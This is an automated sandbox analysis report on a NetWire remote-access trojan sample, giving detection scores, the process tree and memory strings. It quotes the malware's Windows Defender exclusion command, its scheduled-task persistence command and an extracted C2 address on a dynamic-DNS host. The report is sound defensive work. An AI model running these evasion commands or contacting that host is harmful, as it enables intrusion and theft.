Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report g94e4BgSRN.exe

Overview

General Information

Sample Name:g94e4BgSRN.exe
Analysis ID:553285
MD5:d058c6416284f291d6bc7e183293da1f
SHA1:9fe97ad0c11997b7c0ca5a43aff43cc8bdb915b6
SHA256:c47c4a57e7521c6886ca3764b32ad1e5d8669f2fbf6b127fe7a832f1f3b74ec5
Tags:exeNetWireRAT
Infos:

Most interesting Screenshot:

Detection

NetWire
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected NetWire RAT
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Sigma detected: Powershell Defender Exclusion
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • g94e4BgSRN.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\g94e4BgSRN.exe" MD5: D058C6416284F291D6BC7E183293DA1F)
    • powershell.exe (PID: 6780 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6796 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • g94e4BgSRN.exe (PID: 6976 cmdline: C:\Users\user\Desktop\g94e4BgSRN.exe MD5: D058C6416284F291D6BC7E183293DA1F)
  • cleanup

Malware Configuration

Threatname: NetWire

{"C2 list": ["podzeye.duckdns.org:6688"], "Password": "Password", "Host ID": "HostId-%Rand%", "Mutex": "-", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "-"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmpJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
    00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmpJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
      00000009.00000000.280983052.0000000000400000.00000040.00000001.sdmpJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
        00000009.00000000.281635680.0000000000400000.00000040.00000001.sdmpJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
          00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmpJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
            Click to see the 9 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.0.g94e4BgSRN.exe.400000.10.raw.unpackJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
              9.0.g94e4BgSRN.exe.400000.16.unpackJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
                9.0.g94e4BgSRN.exe.400000.12.unpackJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
                  9.0.g94e4BgSRN.exe.400000.4.unpackJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
                    9.0.g94e4BgSRN.exe.400000.16.raw.unpackJoeSecurity_NetWire_1Yara detected NetWire RATJoe Security
                      Click to see the 15 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicius Add Task From User AppData TempShow sources
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\g94e4BgSRN.exe" , ParentImage: C:\Users\user\Desktop\g94e4BgSRN.exe, ParentProcessId: 6384, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp, ProcessId: 6796
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g94e4BgSRN.exe" , ParentImage: C:\Users\user\Desktop\g94e4BgSRN.exe, ParentProcessId: 6384, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, ProcessId: 6780
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\g94e4BgSRN.exe" , ParentImage: C:\Users\user\Desktop\g94e4BgSRN.exe, ParentProcessId: 6384, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe, ProcessId: 6780
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132866781239094432.6780.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 9.0.g94e4BgSRN.exe.400000.14.unpackMalware Configuration Extractor: NetWire {"C2 list": ["podzeye.duckdns.org:6688"], "Password": "Password", "Host ID": "HostId-%Rand%", "Mutex": "-", "Install Path": "-", "Startup Name": "-", "ActiveX Key": "-", "KeyLog Directory": "-"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: g94e4BgSRN.exeVirustotal: Detection: 49%Perma Link
                      Source: g94e4BgSRN.exeReversingLabs: Detection: 62%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: podzeye.duckdns.orgVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\SiEKNQVnm.exeReversingLabs: Detection: 62%
                      Source: 9.0.g94e4BgSRN.exe.400000.14.unpackAvira: Label: TR/Spy.Gen
                      Source: 9.0.g94e4BgSRN.exe.400000.10.unpackAvira: Label: TR/Spy.Gen
                      Source: 9.0.g94e4BgSRN.exe.400000.6.unpackAvira: Label: TR/Spy.Gen
                      Source: 9.0.g94e4BgSRN.exe.400000.8.unpackAvira: Label: TR/Spy.Gen
                      Source: 9.0.g94e4BgSRN.exe.400000.18.unpackAvira: Label: TR/Spy.Gen
                      Source: 0.2.g94e4BgSRN.exe.3873c18.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 9.0.g94e4BgSRN.exe.400000.12.unpackAvira: Label: TR/Spy.Gen
                      Source: 9.0.g94e4BgSRN.exe.400000.16.unpackAvira: Label: TR/Spy.Gen
                      Source: 9.0.g94e4BgSRN.exe.400000.4.unpackAvira: Label: TR/Spy.Gen
                      Source: 9.2.g94e4BgSRN.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
                      Source: 0.2.g94e4BgSRN.exe.389be38.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: g94e4BgSRN.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: g94e4BgSRN.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\hXbuxbBIVw\src\obj\Debug\SoapInteg.pdb source: g94e4BgSRN.exe, SiEKNQVnm.exe.0.dr

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: podzeye.duckdns.org:6688
                      Uses dynamic DNS servicesShow sources
                      Source: unknownDNS query: name: podzeye.duckdns.org
                      Source: Joe Sandbox ViewASN Name: ASGHOSTNETDE ASGHOSTNETDE
                      Source: Joe Sandbox ViewIP Address: 109.205.178.244 109.205.178.244
                      Source: global trafficTCP traffic: 192.168.2.5:49758 -> 109.205.178.244:6688
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: g94e4BgSRN.exe, 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                      Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249404999.00000000057FD000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249294569.00000000057FE000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249210789.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249341645.00000000057FD000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249888666.00000000057F4000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                      Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: g94e4BgSRN.exe, 00000000.00000003.249228910.00000000057FE000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                      Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.)K
                      Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.2K-
                      Source: g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comceTFp
                      Source: g94e4BgSRN.exe, 00000000.00000003.251756053.00000000057F4000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.come
                      Source: g94e4BgSRN.exe, 00000000.00000003.246496422.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246436621.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246372251.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: g94e4BgSRN.exe, 00000000.00000003.246496422.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246471898.000000000580B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: g94e4BgSRN.exe, 00000000.00000003.248047122.00000000057FD000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn#
                      Source: g94e4BgSRN.exe, 00000000.00000003.248047122.00000000057FD000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn)
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/0
                      Source: g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
                      Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0n
                      Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0n1
                      Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/f
                      Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/k
                      Source: g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-u
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: g94e4BgSRN.exe, 00000000.00000003.247402628.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.247429610.000000000580B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlar?
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: g94e4BgSRN.exeString found in binary or memory: http://www.yandex.com
                      Source: g94e4BgSRN.exe, 00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.287524308.0000000003873000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000000.276611463.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.yandex.comsocks=
                      Source: g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249133388.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249210789.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: unknownDNS traffic detected: queries for: podzeye.duckdns.org
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00405FBE recv,9_2_00405FBE

                      System Summary:

                      barindex
                      Source: g94e4BgSRN.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 0_2_00B6EA900_2_00B6EA90
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 0_2_00B6EA800_2_00B6EA80
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 0_2_00B6CAD40_2_00B6CAD4
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 0_2_0027A7A00_2_0027A7A0
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004030479_2_00403047
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0041D0499_2_0041D049
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004194639_2_00419463
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004150799_2_00415079
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004204209_2_00420420
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004208C09_2_004208C0
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004034D39_2_004034D3
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004149769_2_00414976
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00402E689_2_00402E68
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_004166199_2_00416619
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040AEC69_2_0040AEC6
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00402AFC9_2_00402AFC
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00415ABF9_2_00415ABF
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00420F409_2_00420F40
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0041FF509_2_0041FF50
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_0040A7289_2_0040A728
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: 9_2_00BDA7A09_2_00BDA7A0
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: String function: 004081AA appears 110 times
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeCode function: String function: 0041F724 appears 31 times
                      Source: g94e4BgSRN.exe, 00000000.00000002.289787258.0000000008D40000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs g94e4BgSRN.exe
                      Source: g94e4BgSRN.exe, 00000000.00000002.285818219.000000000034D000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSoapInteg.exeF vs g94e4BgSRN.exe
                      Source: g94e4BgSRN.exe, 00000000.00000002.286758625.0000000003631000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs g94e4BgSRN.exe
                      Source: g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs g94e4BgSRN.exe
                      Source: g94e4BgSRN.exe, 00000009.00000000.273523532.0000000000CAD000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSoapInteg.exeF vs g94e4BgSRN.exe
                      Source: g94e4BgSRN.exeBinary or memory string: OriginalFilenameSoapInteg.exeF vs g94e4BgSRN.exe
                      Source: g94e4BgSRN.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: SiEKNQVnm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: g94e4BgSRN.exeVirustotal: Detection: 49%
                      Source: g94e4BgSRN.exeReversingLabs: Detection: 62%
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeFile read: C:\Users\user\Desktop\g94e4BgSRN.exeJump to behavior
                      Source: g94e4BgSRN.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\g94e4BgSRN.exe "C:\Users\user\Desktop\g94e4BgSRN.exe"
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Users\user\Desktop\g94e4BgSRN.exe C:\Users\user\Desktop\g94e4BgSRN.exe
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SiEKNQVnm.exeJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SiEKNQVnm" /XML "C:\Users\user\AppData\Local\Temp\tmp2A91.tmpJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeProcess created: C:\Users\user\Desktop\g94e4BgSRN.exe C:\Users\user\Desktop\g94e4BgSRN.exeJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeFile created: C:\Users\user\AppData\Roaming\SiEKNQVnm.exeJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2A91.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/8@1/1
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeMutant created: \Sessions\1\BaseNamedObjects\-
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeMutant created: \Sessions\1\BaseNamedObjects\LHYnnrIIXQJlqGseSnyzoQyOK
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: g94e4BgSRN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
